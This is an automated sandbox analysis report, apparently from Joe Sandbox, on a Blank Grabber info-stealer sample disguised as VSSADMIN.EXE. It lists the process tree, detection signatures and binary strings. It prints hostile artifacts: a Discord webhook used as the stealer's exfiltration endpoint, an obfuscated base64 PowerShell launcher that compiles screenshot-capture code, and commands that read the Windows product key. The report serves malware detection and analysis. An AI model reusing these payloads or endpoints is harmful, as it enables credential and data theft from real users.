      • cmd.exe (PID: 1080 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6228 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 1008 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 9 entries

              Sigma Signatures

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAH

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
              Found malware configuration
              Source: VSSADMIN.EXE.exe.6872.1.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k"}
              Multi AV Scanner detection for submitted file
              Source: VSSADMIN.EXE.exeReversingLabs: Detection: 23%
              Multi AV Scanner detection for dropped file
              Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scrReversingLabs: Detection: 23%
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE74901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,59_2_00007FF6EE74901C
              Source: VSSADMIN.EXE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245837300.00007FFD43EF0000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: VSSADMIN.EXE.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdb source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: 0.pdb(kD . source: powershell.exe, 00000025.00000002.224011476.000001FBAB192000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp, rar.exe, 0000003B.00000000.226038634.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246494699.00007FFD592D1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdbhP source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246395707.00007FFD59241000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246442794.00007FFD59271000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246354219.00007FFD55601000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246310845.00007FFD52DF1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246171168.00007FFD507E1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246126564.00007FFD449E1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.246012635.00007FFD43FC1000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C77850 FindFirstFileExW,FindClose,0_2_00007FF614C77850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 0_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF614C909E4
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF614C86744
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C77850 FindFirstFileExW,FindClose,1_2_00007FF614C77850
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeCode function: 1_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF614C909E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7546EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,59_2_00007FF6EE7546EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE7988E0 FindFirstFileExA,59_2_00007FF6EE7988E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exeCode function: 59_2_00007FF6EE74E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,59_2_00007FF6EE74E21C

              Networking

              barindex
              May check the online IP address of the machine
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeDNS query: name: ip-api.com
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeDNS query: name: ip-api.com
              Potential dropper URLs found in powershell memory
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245103939.0000014C6D276000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244323782.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D269000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.204299470.0000019668D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.223682537.000001FBAB080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.p
